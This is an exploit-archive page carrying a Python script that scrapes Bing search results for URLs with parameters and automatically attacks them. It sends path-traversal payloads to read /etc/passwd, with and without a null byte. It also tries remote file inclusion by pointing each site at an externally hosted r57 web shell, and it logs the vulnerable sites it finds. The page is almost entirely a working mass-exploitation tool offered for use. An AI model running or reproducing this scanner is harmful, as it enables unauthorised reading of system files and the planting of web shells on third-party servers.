exploit the possibilities

Bing LFI / RFI Scanner

Bing LFI / RFI Scanner
Posted May 12, 2013
Authored by miyachung

This is a python script for searching Bing for sites that may have local and remote file inclusion vulnerabilities.

tags | tool, remote, local, scanner, vulnerability, python, file inclusion
systems | unix
MD5 | 2eded19454a21f6f4d44371cffbec5d8

Bing LFI / RFI Scanner

Change Mirror Download
##################################################
# Bing LFI-RFI Searcher
# Coded by Miyachung
# Janissaries.Org
# Miyachung@hotmail.com
##################################################
import threading
import urllib2,urllib,socket
import re
import time
import sys
socket.setdefaulttimeout(5)
def dorker(url,limit,shell):
try:
regex = re.compile("h3><a href=\"(.*?)\" h=")
path = "../../../../../../../../../../../../../../etc/passwd"
pathn = "../../../../../../../../../../../../../../etc/passwd%00"
conn = urllib2.urlopen(url)
data = conn.read()
links= regex.findall(data)
for link in links:
link = link.strip()
if re.search("=",link) and link.find("youtube") == -1 and link.find("forum") == -1 and link.find("google") == -1 and link.find("viewtopic") == -1 and link.find("showthread") == -1 and link.find("blog") == -1 and link.find("yahoo") == -1:
link = link.split('=')
link = link[0]+"="
check= urllib2.urlopen(link+path,None,3).read()
if re.search("root:x",check):
a = "#########################################################\r\n"
a+= "[+]"+link+" /etc/passwd readed without null byte\r\n"
a+= "[+]read -> "+link+path+"\r\n"
a+= "[+]coded by miyachung\r\n"
print a + "#########################################################"
kaydet(a)
else:
check = urllib2.urlopen(link+pathn,None,3).read()
if re.search("root:x",check):
a = "#########################################################\r\n"
a += "[+]"+link+" /etc/passwd readed with null byte!\r\n"
a += "[+]read -> "+link+pathn+"\r\n"
a += "[+]coded by miyachung\r\n"
print a + "#########################################################"
kaydet(a)
else:
print link+" hasn't got lfi vulnerability"
checkrfi = urllib2.urlopen(link+shell,None,3).read()
if re.search("safe_mode",checkrfi):
a = "#########################################################\r\n"
a+= "[+]remote file include vulnerability works!\r\n"
a+= "[+]shell -> "+link+shell+"\r\n"
a+= "[+]coded by miyachung\r\n"
print a + "#########################################################"
kaydet(a)
else:
print link+" hasn't got rfi vulnerability"
except urllib2.URLError:
print link+" urlerror"
pass
except urllib2.HTTPError:
print link+" httperror"
pass
except socket.timeout:
print link+" timeout"
pass
except:
pass

limit.release()
def kaydet(yazi):
ac = open('results.txt','ab')
ac.write(yazi)
ac.close()
class Exploiter:
def main(self,dorks,thread,shell):
for dork in open(dorks):
dork = dork.strip()
i = 1
limit = threading.BoundedSemaphore(value=thread)
tasks = []
while i <= 451:
limit.acquire()
th = threading.Thread(target=dorker,args=("http://www.bing.com/search?q="+urllib.quote_plus(dork)+"&count=50&first="+str(i)+"&FORM=PERE",limit,shell,))
tasks.append(th)
th.start()
i += 50
for t in tasks:
t.join()
try:
exploit = Exploiter()
exploit.main(sys.argv[1],int(sys.argv[2]),"http://www.xfocus.net/tools/200608/r57.txt?")
except IndexError:
print "# Bing LFI-RFI Searcher"
print "# Coded by Miyachung"
print "# Janissaries.Org"
print "Usage: python searcher.py DORKLISTFILE THREAD"
print "Examp: python searcher.py dorks.txt 10"
Login or Register to add favorites

File Archive:

August 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    2 Files
  • 2
    Aug 2nd
    3 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    0 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close